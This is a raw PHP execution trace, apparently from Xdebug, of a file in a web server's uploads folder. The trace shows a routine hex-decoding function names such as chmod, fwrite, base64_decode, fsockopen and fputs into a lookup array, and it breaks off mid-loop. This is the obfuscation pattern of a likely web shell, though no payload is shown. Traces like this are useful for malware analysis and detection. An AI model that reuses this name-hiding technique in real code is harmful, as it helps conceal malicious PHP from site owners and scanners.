2	1617	0	0.059894	722824	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'636c6173735f657869737473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 23
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1618	0	0.059953	722856	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1618	1	0.059965	722904
3	1618	R			99
3	1619	0	0.059977	722824	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1619	1	0.059989	722864
3	1619	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1620	0	0.060019	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6c'
3	1620	1	0.060031	722936
3	1620	R			108
3	1621	0	0.060043	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	108
3	1621	1	0.060055	722896
3	1621	R			'l'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1622	0	0.060085	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1622	1	0.060097	722936
3	1622	R			97
3	1623	0	0.060109	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1623	1	0.060120	722896
3	1623	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1624	0	0.060151	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1624	1	0.060163	722936
3	1624	R			115
3	1625	0	0.060175	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1625	1	0.060186	722896
3	1625	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1626	0	0.060216	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1626	1	0.060231	722936
3	1626	R			115
3	1627	0	0.060243	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1627	1	0.060255	722896
3	1627	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1628	0	0.060285	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1628	1	0.060297	722936
3	1628	R			95
3	1629	0	0.060309	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1629	1	0.060320	722896
3	1629	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1630	0	0.060350	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1630	1	0.060361	722936
3	1630	R			101
3	1631	0	0.060373	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1631	1	0.060385	722896
3	1631	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1632	0	0.060415	722888	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'78'
3	1632	1	0.060427	722936
3	1632	R			120
3	1633	0	0.060439	722856	chr	0		/var/www/html/uploads/1CTT.php	204	1	120
3	1633	1	0.060450	722896
3	1633	R			'x'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1634	0	0.060480	722896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1634	1	0.060492	722944
3	1634	R			105
3	1635	0	0.060504	722864	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1635	1	0.060514	722904
3	1635	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1636	0	0.060545	722896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1636	1	0.060557	722944
3	1636	R			115
3	1637	0	0.060569	722864	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1637	1	0.060580	722904
3	1637	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1638	0	0.060610	722896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1638	1	0.060622	722944
3	1638	R			116
3	1639	0	0.060634	722864	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1639	1	0.060645	722904
3	1639	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1640	0	0.060675	722896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1640	1	0.060686	722944
3	1640	R			115
3	1641	0	0.060698	722864	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1641	1	0.060709	722904
3	1641	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1617	1	0.060739	722864
2	1617	R			'class_exists'
1		A						/var/www/html/uploads/1CTT.php	7	$func[83] = 'class_exists'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1642	0	0.060774	722864	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'737072696e7466'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 13
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1643	0	0.060815	722896	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1643	1	0.060826	722944
3	1643	R			115
3	1644	0	0.060838	722864	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1644	1	0.060850	722904
3	1644	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1645	0	0.060880	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1645	1	0.060892	722976
3	1645	R			112
3	1646	0	0.060904	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1646	1	0.060916	722936
3	1646	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1647	0	0.060951	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1647	1	0.060962	722976
3	1647	R			114
3	1648	0	0.060974	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1648	1	0.060986	722936
3	1648	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1649	0	0.061016	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1649	1	0.061028	722976
3	1649	R			105
3	1650	0	0.061041	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1650	1	0.061051	722936
3	1650	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1651	0	0.061082	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1651	1	0.061094	722976
3	1651	R			110
3	1652	0	0.061106	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1652	1	0.061117	722936
3	1652	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1653	0	0.061147	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1653	1	0.061159	722976
3	1653	R			116
3	1654	0	0.061171	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1654	1	0.061183	722936
3	1654	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1655	0	0.061212	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1655	1	0.061224	722976
3	1655	R			102
3	1656	0	0.061236	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1656	1	0.061247	722936
3	1656	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1642	1	0.061277	722896
2	1642	R			'sprintf'
1		A						/var/www/html/uploads/1CTT.php	7	$func[84] = 'sprintf'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1657	0	0.061312	722896	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'63686d6f64'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1658	0	0.061352	722928	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1658	1	0.061364	722976
3	1658	R			99
3	1659	0	0.061376	722896	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1659	1	0.061388	722936
3	1659	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1660	0	0.061419	722960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'68'
3	1660	1	0.061430	723008
3	1660	R			104
3	1661	0	0.061443	722928	chr	0		/var/www/html/uploads/1CTT.php	204	1	104
3	1661	1	0.061454	722968
3	1661	R			'h'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1662	0	0.061484	722960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6d'
3	1662	1	0.061496	723008
3	1662	R			109
3	1663	0	0.061509	722928	chr	0		/var/www/html/uploads/1CTT.php	204	1	109
3	1663	1	0.061520	722968
3	1663	R			'm'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1664	0	0.061551	722960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1664	1	0.061562	723008
3	1664	R			111
3	1665	0	0.061574	722928	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1665	1	0.061585	722968
3	1665	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1666	0	0.061616	722960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1666	1	0.061627	723008
3	1666	R			100
3	1667	0	0.061639	722928	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1667	1	0.061650	722968
3	1667	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1657	1	0.061683	722928
2	1657	R			'chmod'
1		A						/var/www/html/uploads/1CTT.php	7	$func[85] = 'chmod'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1668	0	0.061717	722928	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'666f70656e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1669	0	0.061757	722960	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1669	1	0.061769	723008
3	1669	R			102
3	1670	0	0.061782	722928	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1670	1	0.061792	722968
3	1670	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1671	0	0.061823	722992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1671	1	0.061835	723040
3	1671	R			111
3	1672	0	0.061847	722960	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1672	1	0.061858	723000
3	1672	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1673	0	0.061889	722992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1673	1	0.061901	723040
3	1673	R			112
3	1674	0	0.061913	722960	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1674	1	0.061925	723000
3	1674	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1675	0	0.061954	722992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1675	1	0.061965	723040
3	1675	R			101
3	1676	0	0.061978	722960	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1676	1	0.061989	723000
3	1676	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1677	0	0.062019	722992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1677	1	0.062031	723040
3	1677	R			110
3	1678	0	0.062043	722960	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1678	1	0.062054	723000
3	1678	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1668	1	0.062084	722960
2	1668	R			'fopen'
1		A						/var/www/html/uploads/1CTT.php	7	$func[86] = 'fopen'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1679	0	0.062118	722960	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'667772697465'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 11
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1680	0	0.062158	722992	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1680	1	0.062170	723040
3	1680	R			102
3	1681	0	0.062182	722960	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1681	1	0.062194	723000
3	1681	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1682	0	0.062224	723024	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'77'
3	1682	1	0.062236	723072
3	1682	R			119
3	1683	0	0.062248	722992	chr	0		/var/www/html/uploads/1CTT.php	204	1	119
3	1683	1	0.062260	723032
3	1683	R			'w'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'w'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1684	0	0.062290	723024	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'72'
3	1684	1	0.062302	723072
3	1684	R			114
3	1685	0	0.062315	722992	chr	0		/var/www/html/uploads/1CTT.php	204	1	114
3	1685	1	0.062326	723032
3	1685	R			'r'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1686	0	0.062356	723024	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'69'
3	1686	1	0.062368	723072
3	1686	R			105
3	1687	0	0.062384	722992	chr	0		/var/www/html/uploads/1CTT.php	204	1	105
3	1687	1	0.062396	723032
3	1687	R			'i'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1688	0	0.062426	723024	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1688	1	0.062437	723072
3	1688	R			116
3	1689	0	0.062450	722992	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1689	1	0.062461	723032
3	1689	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1690	0	0.062491	723024	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1690	1	0.062502	723072
3	1690	R			101
3	1691	0	0.062515	722992	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1691	1	0.062526	723032
3	1691	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1679	1	0.062556	722992
2	1679	R			'fwrite'
1		A						/var/www/html/uploads/1CTT.php	7	$func[87] = 'fwrite'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1692	0	0.062590	722992	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6261736536345f6465636f6465'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 25
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1693	0	0.062641	723024	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'62'
3	1693	1	0.062653	723072
3	1693	R			98
3	1694	0	0.062666	722992	chr	0		/var/www/html/uploads/1CTT.php	204	1	98
3	1694	1	0.062677	723032
3	1694	R			'b'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1695	0	0.062708	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'61'
3	1695	1	0.062720	723104
3	1695	R			97
3	1696	0	0.062733	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	97
3	1696	1	0.062744	723064
3	1696	R			'a'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1697	0	0.062775	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1697	1	0.062787	723104
3	1697	R			115
3	1698	0	0.062799	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1698	1	0.062811	723064
3	1698	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1699	0	0.062841	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1699	1	0.062853	723104
3	1699	R			101
3	1700	0	0.062865	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1700	1	0.062876	723064
3	1700	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1701	0	0.062906	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'36'
3	1701	1	0.062918	723104
3	1701	R			54
3	1702	0	0.062930	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	54
3	1702	1	0.062942	723064
3	1702	R			'6'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '6'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1703	0	0.062972	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'34'
3	1703	1	0.062983	723104
3	1703	R			52
3	1704	0	0.062996	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	52
3	1704	1	0.063006	723064
3	1704	R			'4'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '4'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1705	0	0.063036	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'5f'
3	1705	1	0.063048	723104
3	1705	R			95
3	1706	0	0.063060	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	95
3	1706	1	0.063072	723064
3	1706	R			'_'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= '_'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1707	0	0.063105	723056	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1707	1	0.063117	723104
3	1707	R			100
3	1708	0	0.063129	723024	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1708	1	0.063140	723064
3	1708	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1709	0	0.063170	723064	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1709	1	0.063182	723112
3	1709	R			101
3	1710	0	0.063194	723032	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1710	1	0.063204	723072
3	1710	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1711	0	0.063234	723064	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1711	1	0.063246	723112
3	1711	R			99
3	1712	0	0.063258	723032	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1712	1	0.063270	723072
3	1712	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1713	0	0.063299	723064	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1713	1	0.063311	723112
3	1713	R			111
3	1714	0	0.063324	723032	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1714	1	0.063335	723072
3	1714	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1715	0	0.063365	723064	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'64'
3	1715	1	0.063376	723112
3	1715	R			100
3	1716	0	0.063389	723032	chr	0		/var/www/html/uploads/1CTT.php	204	1	100
3	1716	1	0.063400	723072
3	1716	R			'd'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1717	0	0.063429	723064	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1717	1	0.063441	723112
3	1717	R			101
3	1718	0	0.063453	723032	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1718	1	0.063464	723072
3	1718	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1692	1	0.063494	723032
2	1692	R			'base64_decode'
1		A						/var/www/html/uploads/1CTT.php	7	$func[88] = 'base64_decode'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1719	0	0.063528	723032	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'66736f636b6f70656e'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 17
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1720	0	0.063570	723064	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1720	1	0.063581	723112
3	1720	R			102
3	1721	0	0.063594	723032	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1721	1	0.063605	723072
3	1721	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1722	0	0.063636	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1722	1	0.063647	723144
3	1722	R			115
3	1723	0	0.063659	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1723	1	0.063670	723104
3	1723	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1724	0	0.063700	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1724	1	0.063712	723144
3	1724	R			111
3	1725	0	0.063725	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1725	1	0.063735	723104
3	1725	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1726	0	0.063766	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'63'
3	1726	1	0.063778	723144
3	1726	R			99
3	1727	0	0.063790	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	99
3	1727	1	0.063802	723104
3	1727	R			'c'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1728	0	0.063835	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6b'
3	1728	1	0.063847	723144
3	1728	R			107
3	1729	0	0.063859	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	107
3	1729	1	0.063871	723104
3	1729	R			'k'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1730	0	0.063904	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6f'
3	1730	1	0.063927	723144
3	1730	R			111
3	1731	0	0.063941	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	111
3	1731	1	0.063955	723104
3	1731	R			'o'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1732	0	0.063985	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1732	1	0.063997	723144
3	1732	R			112
3	1733	0	0.064009	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1733	1	0.064020	723104
3	1733	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1734	0	0.064050	723096	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'65'
3	1734	1	0.064062	723144
3	1734	R			101
3	1735	0	0.064074	723064	chr	0		/var/www/html/uploads/1CTT.php	204	1	101
3	1735	1	0.064084	723104
3	1735	R			'e'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1736	0	0.064114	723104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'6e'
3	1736	1	0.064126	723152
3	1736	R			110
3	1737	0	0.064138	723072	chr	0		/var/www/html/uploads/1CTT.php	204	1	110
3	1737	1	0.064149	723112
3	1737	R			'n'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1719	1	0.064179	723072
2	1719	R			'fsockopen'
1		A						/var/www/html/uploads/1CTT.php	7	$func[89] = 'fsockopen'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1738	0	0.064213	723072	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6670757473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1739	0	0.064254	723104	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1739	1	0.064265	723152
3	1739	R			102
3	1740	0	0.064278	723072	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1740	1	0.064289	723112
3	1740	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1741	0	0.064320	723136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'70'
3	1741	1	0.064332	723184
3	1741	R			112
3	1742	0	0.064344	723104	chr	0		/var/www/html/uploads/1CTT.php	204	1	112
3	1742	1	0.064355	723144
3	1742	R			'p'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1743	0	0.064385	723136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'75'
3	1743	1	0.064397	723184
3	1743	R			117
3	1744	0	0.064409	723104	chr	0		/var/www/html/uploads/1CTT.php	204	1	117
3	1744	1	0.064421	723144
3	1744	R			'u'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1745	0	0.064451	723136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'74'
3	1745	1	0.064463	723184
3	1745	R			116
3	1746	0	0.064475	723104	chr	0		/var/www/html/uploads/1CTT.php	204	1	116
3	1746	1	0.064487	723144
3	1746	R			't'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 't'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1747	0	0.064517	723136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'73'
3	1747	1	0.064528	723184
3	1747	R			115
3	1748	0	0.064540	723104	chr	0		/var/www/html/uploads/1CTT.php	204	1	115
3	1748	1	0.064555	723144
3	1748	R			's'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 's'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
2	1738	1	0.064585	723104
2	1738	R			'fputs'
1		A						/var/www/html/uploads/1CTT.php	7	$func[90] = 'fputs'
1		A						/var/www/html/uploads/1CTT.php	6	$i++
2	1749	0	0.064619	723104	dehex	1		/var/www/html/uploads/1CTT.php	7	1	'6667657473'
2		A						/var/www/html/uploads/1CTT.php	201	$r = ''
2		A						/var/www/html/uploads/1CTT.php	202	$len = 9
2		A						/var/www/html/uploads/1CTT.php	203	$i = 0
3	1750	0	0.064659	723136	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'66'
3	1750	1	0.064670	723184
3	1750	R			102
3	1751	0	0.064683	723104	chr	0		/var/www/html/uploads/1CTT.php	204	1	102
3	1751	1	0.064694	723144
3	1751	R			'f'
2		A						/var/www/html/uploads/1CTT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/1CTT.php	203	$i += 2
3	1752	0	0.064725	723168	hexdec	0		/var/www/html/uploads/1CTT.php	204	1	'67'
